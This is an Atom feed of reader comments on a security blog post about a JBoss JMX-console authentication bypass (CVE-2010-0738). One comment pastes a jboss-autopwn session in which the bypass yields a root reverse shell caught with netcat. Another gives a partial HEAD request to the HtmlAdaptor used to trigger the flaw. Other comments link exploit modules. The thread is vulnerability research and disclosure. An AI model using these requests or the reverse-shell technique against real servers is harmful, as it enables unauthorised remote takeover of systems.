<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/'><id>tag:blogger.com,1999:blog-7122745763234660283.post1907507360004730740..comments</id><updated>2011-10-21T05:20:56.107-07:00</updated><category term='jQuery'/><category term='Web Attacks'/><category term='Advisory'/><category term='Applet Security'/><category term='Http Request Splitting'/><category term='Application Security'/><category term='Http Parameter Pollution'/><category term='malware'/><category term='Cross Site Scripting'/><category term='Dom Xss'/><category term='DOMinator'/><category term='WWeb Security'/><category term='Banking'/><category term='Java'/><category term='Information Disclosure'/><category term='Omniture'/><category term='Spring MVC'/><category term='Expression Language Injection'/><category term='Java Security'/><category term='twitter'/><category term='Sharepoint'/><category term='Web Security'/><category term='Client Side HTTP Parameter Pollution'/><category term='JNLP Security'/><category term='JSON'/><category term='Liferay'/><category term='Same Origin Policy'/><category term='Arbitrary Code Execution'/><title type='text'>Comments on Minded Security Blog: Good Bye Critical Jboss 0day</title><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://blog.mindedsecurity.com/feeds/1907507360004730740/comments/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default'/><link rel='alternate' type='text/html' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html'/><author><name>Minded Security</name><uri>http://www.blogger.com/profile/01503616812076743415</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>11</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7122745763234660283.post-8679926218973682512</id><published>2011-10-21T05:16:30.410-07:00</published><updated>2011-10-21T05:16:30.410-07:00</updated><title type='text'>The verb tampering security issue in the JMX conso...</title><content type='html'>The verb tampering security issue in the JMX console has been ported also to BeEF many months ago (presented at CONFidence May 2011)&lt;br /&gt;&lt;br /&gt;http://antisnatchor.com/JBoss_JMX_Deploy_Exploit&lt;br /&gt;&lt;br /&gt;Cheers&lt;br /&gt;Michele</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/8679926218973682512'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/8679926218973682512'/><link rel='alternate' type='text/html' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html?showComment=1319199390410#c8679926218973682512' title=''/><author><name>antisnatchor</name><uri>http://antisnatchor.com</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img1.blogblog.com/img/blank.gif'/></author><thr:in-reply-to xmlns:thr='http://purl.org/syndication/thread/1.0' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html' ref='tag:blogger.com,1999:blog-7122745763234660283.post-1907507360004730740' source='http://www.blogger.com/feeds/7122745763234660283/posts/default/1907507360004730740' type='text/html'/><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='blogger.itemClass' value='pid-565818301'/></entry><entry><id>tag:blogger.com,1999:blog-7122745763234660283.post-532963563189618509</id><published>2010-05-11T17:02:09.597-07:00</published><updated>2010-05-11T17:02:09.597-07:00</updated><title type='text'>A metasploit module now exist to abuse the issue a...</title><content type='html'>A metasploit module now exist to abuse the issue as well.&lt;br /&gt;&lt;br /&gt;http://www.metasploit.com/redmine/projects/framework/repository/revisions/9285/entry/modules/exploits/multi/http/jboss_deploymentfilerepository.rb</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/532963563189618509'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/532963563189618509'/><link rel='alternate' type='text/html' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html?showComment=1273622529597#c532963563189618509' title=''/><author><name>mc</name><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img1.blogblog.com/img/blank.gif'/></author><thr:in-reply-to xmlns:thr='http://purl.org/syndication/thread/1.0' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html' ref='tag:blogger.com,1999:blog-7122745763234660283.post-1907507360004730740' source='http://www.blogger.com/feeds/7122745763234660283/posts/default/1907507360004730740' type='text/html'/><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='blogger.itemClass' value='pid-53189792'/></entry><entry><id>tag:blogger.com,1999:blog-7122745763234660283.post-5232832148305438955</id><published>2010-05-10T14:07:39.092-07:00</published><updated>2010-05-10T14:07:39.092-07:00</updated><title type='text'>Guys, I have been trying to reproduce this vulnera...</title><content type='html'>Guys, I have been trying to reproduce this vulnerability in version 4.0.4 and I haven&amp;#39;t had much luck!!! :( Any ideas...???</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/5232832148305438955'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/5232832148305438955'/><link rel='alternate' type='text/html' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html?showComment=1273525659092#c5232832148305438955' title=''/><author><name>Bill</name><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img1.blogblog.com/img/blank.gif'/></author><thr:in-reply-to xmlns:thr='http://purl.org/syndication/thread/1.0' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html' ref='tag:blogger.com,1999:blog-7122745763234660283.post-1907507360004730740' source='http://www.blogger.com/feeds/7122745763234660283/posts/default/1907507360004730740' type='text/html'/><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='blogger.itemClass' value='pid-1779464565'/></entry><entry><id>tag:blogger.com,1999:blog-7122745763234660283.post-7742583809824257476</id><published>2010-05-10T00:55:34.271-07:00</published><updated>2010-05-10T00:55:34.271-07:00</updated><title type='text'>@Dennis You should ask to the author (Christian Pa...</title><content type='html'>@Dennis You should ask to the author (Christian Papathanasiou), we don&amp;#39;t know when he&amp;#39;ll release it.</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/7742583809824257476'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/7742583809824257476'/><link rel='alternate' type='text/html' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html?showComment=1273478134271#c7742583809824257476' title=''/><author><name>Minded Security</name><uri>http://www.blogger.com/profile/01503616812076743415</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:in-reply-to xmlns:thr='http://purl.org/syndication/thread/1.0' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html' ref='tag:blogger.com,1999:blog-7122745763234660283.post-1907507360004730740' source='http://www.blogger.com/feeds/7122745763234660283/posts/default/1907507360004730740' type='text/html'/><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='blogger.itemClass' value='pid-1570645034'/></entry><entry><id>tag:blogger.com,1999:blog-7122745763234660283.post-1607334538516340218</id><published>2010-05-06T02:53:22.785-07:00</published><updated>2010-05-06T02:53:22.785-07:00</updated><title type='text'>is it possible to get a version of jboss-autopwn? ...</title><content type='html'>is it possible to get a version of jboss-autopwn? want to test our jboss servers</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/1607334538516340218'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/1607334538516340218'/><link rel='alternate' type='text/html' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html?showComment=1273139602785#c1607334538516340218' title=''/><author><name>Dennis</name><uri>http://www.blogger.com/profile/16662125793528221113</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://3.bp.blogspot.com/_-ajRZyi9XNE/SW9ZrknbqiI/AAAAAAAAAAM/HOqeZ-u34aw/S220/avatar.jpg'/></author><thr:in-reply-to xmlns:thr='http://purl.org/syndication/thread/1.0' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html' ref='tag:blogger.com,1999:blog-7122745763234660283.post-1907507360004730740' source='http://www.blogger.com/feeds/7122745763234660283/posts/default/1907507360004730740' type='text/html'/><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='blogger.itemClass' value='pid-44482040'/></entry><entry><id>tag:blogger.com,1999:blog-7122745763234660283.post-8508394518144416259</id><published>2010-05-03T07:37:15.181-07:00</published><updated>2010-05-03T07:37:15.181-07:00</updated><title type='text'>@Chris: Very happy to see this new addition to jbo...</title><content type='html'>@Chris: Very happy to see this new addition to jboss-autopwn! :D&lt;br /&gt;&lt;br /&gt;@Frank: We have developed a custom exploit that redirects temporarily the output to Jboss status page, which is not password protected by default. This issue has been fixed with &amp;quot;CVE-2010-1429&amp;quot;. During the next few days we will publish it on our website, along with the official advisory.</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/8508394518144416259'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/8508394518144416259'/><link rel='alternate' type='text/html' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html?showComment=1272897435181#c8508394518144416259' title=''/><author><name>Giorgio Fedon</name><uri>http://www.blogger.com/profile/10261243238330266276</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://1.bp.blogspot.com/_vcTLhf3MjL0/SX2S-u9P_iI/AAAAAAAAAAg/1fZmsX7wtRE/S220/giorgio_fedon.jpg'/></author><thr:in-reply-to xmlns:thr='http://purl.org/syndication/thread/1.0' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html' ref='tag:blogger.com,1999:blog-7122745763234660283.post-1907507360004730740' source='http://www.blogger.com/feeds/7122745763234660283/posts/default/1907507360004730740' type='text/html'/><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='blogger.itemClass' value='pid-1631116005'/></entry><entry><id>tag:blogger.com,1999:blog-7122745763234660283.post-324199435133785127</id><published>2010-05-03T05:58:12.003-07:00</published><updated>2010-05-03T05:58:12.003-07:00</updated><title type='text'>Got this working with JBoss-autopwn :-D

Screensho...</title><content type='html'>Got this working with JBoss-autopwn :-D&lt;br /&gt;&lt;br /&gt;Screenshot below..&lt;br /&gt;&lt;br /&gt;[root@foo jboss-autopwn]# ./jboss-autopwn 192.168.1.3 8080&lt;br /&gt;[x] Checking if authentication is enabled..&lt;br /&gt;[!] Authentication enabled!&lt;br /&gt;[x] Proceeding to use CVE-2010-0738 JBoss /jmx-console authentication bypass&lt;br /&gt;[!] Is this a *nix based or Windows based JBoss instance? nix&lt;br /&gt;[!] Which IP should I send the reverse shell to? 192.168.1.2&lt;br /&gt;[!] Which port should I send the reverse shell to? 6669&lt;br /&gt;[x] *nix based selected...&lt;br /&gt;Connection from 192.168.1.3 port 6669 [tcp/*] accepted&lt;br /&gt;[!] you should now have a shell on 192.168.1.2:6669&lt;br /&gt;[root@foo jboss-autopwn]# fg 1&lt;br /&gt;nc -lv 6669&lt;br /&gt;id&lt;br /&gt;uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)&lt;br /&gt;uname -a&lt;br /&gt;Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux&lt;br /&gt;^C&lt;br /&gt;[root@foo jboss-autopwn]# &lt;br /&gt;&lt;br /&gt;Will be testing it some more and sending you guys a copy soon :-)&lt;br /&gt;&lt;br /&gt;Christian Papathanasiou.</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/324199435133785127'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/324199435133785127'/><link rel='alternate' type='text/html' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html?showComment=1272891492003#c324199435133785127' title=''/><author><name>Chris</name><uri>http://www.blogger.com/profile/01526348108211940855</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:in-reply-to xmlns:thr='http://purl.org/syndication/thread/1.0' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html' ref='tag:blogger.com,1999:blog-7122745763234660283.post-1907507360004730740' source='http://www.blogger.com/feeds/7122745763234660283/posts/default/1907507360004730740' type='text/html'/><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='blogger.itemClass' value='pid-391482127'/></entry><entry><id>tag:blogger.com,1999:blog-7122745763234660283.post-4354333360433722987</id><published>2010-04-30T23:55:15.022-07:00</published><updated>2010-04-30T23:55:15.022-07:00</updated><title type='text'>It works. Anyway I cannot get response output, sin...</title><content type='html'>It works. Anyway I cannot get response output, since HEAD method is without response body.&lt;br /&gt;&lt;br /&gt;Do you have any hint for issue a command to download JMX-Console configuration files?&lt;br /&gt;&lt;br /&gt;Thank you</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/4354333360433722987'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/4354333360433722987'/><link rel='alternate' type='text/html' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html?showComment=1272696915022#c4354333360433722987' title=''/><author><name>Frank D.</name><uri>http://www.securityfocus.com</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img1.blogblog.com/img/blank.gif'/></author><thr:in-reply-to xmlns:thr='http://purl.org/syndication/thread/1.0' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html' ref='tag:blogger.com,1999:blog-7122745763234660283.post-1907507360004730740' source='http://www.blogger.com/feeds/7122745763234660283/posts/default/1907507360004730740' type='text/html'/><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='blogger.itemClass' value='pid-865650937'/></entry><entry><id>tag:blogger.com,1999:blog-7122745763234660283.post-2294693274879985084</id><published>2010-04-30T07:42:14.224-07:00</published><updated>2010-04-30T07:42:14.224-07:00</updated><title type='text'>@Steve Thank you!

@Frank

just supply the request...</title><content type='html'>@Steve Thank you!&lt;br /&gt;&lt;br /&gt;@Frank&lt;br /&gt;&lt;br /&gt;just supply the request like this:&lt;br /&gt;&lt;br /&gt;HEAD&lt;br /&gt;/jmx-console/HtmlAdaptor?action=invokeOpByName&amp;amp;name=jboss.deployer%3Aserv....&lt;br /&gt;HTTP/1.1&lt;br /&gt;&lt;br /&gt;Use GET parameters, not POST ;D should work</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/2294693274879985084'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/2294693274879985084'/><link rel='alternate' type='text/html' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html?showComment=1272638534224#c2294693274879985084' title=''/><author><name>Giorgio Fedon</name><uri>http://www.blogger.com/profile/10261243238330266276</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://1.bp.blogspot.com/_vcTLhf3MjL0/SX2S-u9P_iI/AAAAAAAAAAg/1fZmsX7wtRE/S220/giorgio_fedon.jpg'/></author><thr:in-reply-to xmlns:thr='http://purl.org/syndication/thread/1.0' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html' ref='tag:blogger.com,1999:blog-7122745763234660283.post-1907507360004730740' source='http://www.blogger.com/feeds/7122745763234660283/posts/default/1907507360004730740' type='text/html'/><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='blogger.itemClass' value='pid-1631116005'/></entry><entry><id>tag:blogger.com,1999:blog-7122745763234660283.post-1222987128644348027</id><published>2010-04-30T07:39:29.945-07:00</published><updated>2010-04-30T07:39:29.945-07:00</updated><title type='text'>Hi guys.

We are trying to test the exploit but it...</title><content type='html'>Hi guys.&lt;br /&gt;&lt;br /&gt;We are trying to test the exploit but it doesn&amp;#39;t work; any other hint?</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/1222987128644348027'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/1222987128644348027'/><link rel='alternate' type='text/html' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html?showComment=1272638369945#c1222987128644348027' title=''/><author><name>Frank D.</name><uri>http://www.securityfocus.com</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img1.blogblog.com/img/blank.gif'/></author><thr:in-reply-to xmlns:thr='http://purl.org/syndication/thread/1.0' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html' ref='tag:blogger.com,1999:blog-7122745763234660283.post-1907507360004730740' source='http://www.blogger.com/feeds/7122745763234660283/posts/default/1907507360004730740' type='text/html'/><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='blogger.itemClass' value='pid-2056964878'/></entry><entry><id>tag:blogger.com,1999:blog-7122745763234660283.post-2230117168827325636</id><published>2010-04-30T07:37:37.488-07:00</published><updated>2010-04-30T07:37:37.488-07:00</updated><title type='text'>Awesome work Guys!

Steve</title><content type='html'>Awesome work Guys!&lt;br /&gt;&lt;br /&gt;Steve</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/2230117168827325636'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7122745763234660283/1907507360004730740/comments/default/2230117168827325636'/><link rel='alternate' type='text/html' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html?showComment=1272638257488#c2230117168827325636' title=''/><author><name>Anonymous</name><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img1.blogblog.com/img/blank.gif'/></author><thr:in-reply-to xmlns:thr='http://purl.org/syndication/thread/1.0' href='http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html' ref='tag:blogger.com,1999:blog-7122745763234660283.post-1907507360004730740' source='http://www.blogger.com/feeds/7122745763234660283/posts/default/1907507360004730740' type='text/html'/><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='blogger.itemClass' value='pid-2056964878'/></entry></feed>
